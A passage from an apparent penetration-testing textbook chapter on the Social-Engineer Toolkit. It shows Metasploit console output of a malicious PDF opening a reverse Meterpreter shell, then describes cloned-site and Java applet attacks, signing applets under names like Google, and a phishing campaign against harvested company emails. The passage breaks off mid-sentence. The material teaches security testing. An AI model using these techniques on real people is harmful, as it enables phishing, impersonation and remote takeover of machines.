background image

142

Chapter 10

The target opens the PDF thinking it’s legitimate, and his system is 

instantly compromised. On the attacker’s side, you see the following:

[*] Started reverse handler on 10.10.1.112:443
[*] Starting the payload handler...
msf exploit(handler) > [*] Sending stage (748032 bytes) to 10.10.1.102
[*] Meterpreter session 1 opened (10.10.1.112:443 -> 10.10.1.102:58087)

msf exploit(handler) > 

sessions -i 1

[*] Starting interaction with 1...

meterpreter > 

shell

Process 2976 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Bob\Desktop>

This example used a spear-phishing attack to target one user, but SET 

can also be used to attack multiple targets using the “mass email” option. 
You can also create customized templates that can be reused, instead of 
using the prebuilt templates included in SET.

Web Attack Vectors

Web attack vectors are probably one of the most advanced and exciting 
aspects of SET, because they are specifically crafted to be believable and 
enticing to the target. SET can clone websites that look identical to trusted 
sites, helping to ensure that the target will think he is visiting a legitimate site.

Java Applet

The Java applet attack is one of the most successful attack vectors in SET. The 
applet itself was created by one of the SET developers, Thomas Werth. This 
attack introduces a malicious Java applet that does smart browser detection 
(so your exploit works) and delivers a payload to a target’s machine. The Java 
applet attack is not considered a vulnerability by Java. When a target browses 
the malicious site, he is presented with a warning asking if he wants to run an 
untrusted Java applet. Because Java allows you to sign an applet with any name 
you choose, you could call the publisher Google, Microsoft, or any other 
string you choose. By editing the 

set_config

 file and setting 

WEBATTACK_EMAIL

 

to

ON

, you can also incorporate mass emails with this attack.

Let’s walk through a real-world example—a penetration test performed 

for a Fortune 1000 company. First, a copycat domain name, similar to that of 
the actual company website, was registered. Next, the attacker scraped the 
Internet looking for 

@<company>.com

 email addresses using the harvester 

module within Metasploit. After extracting 200 email addresses from public 
websites, mass emails were sent to these addresses. The attack email claimed 
to be from the company’s communications department and asked the employee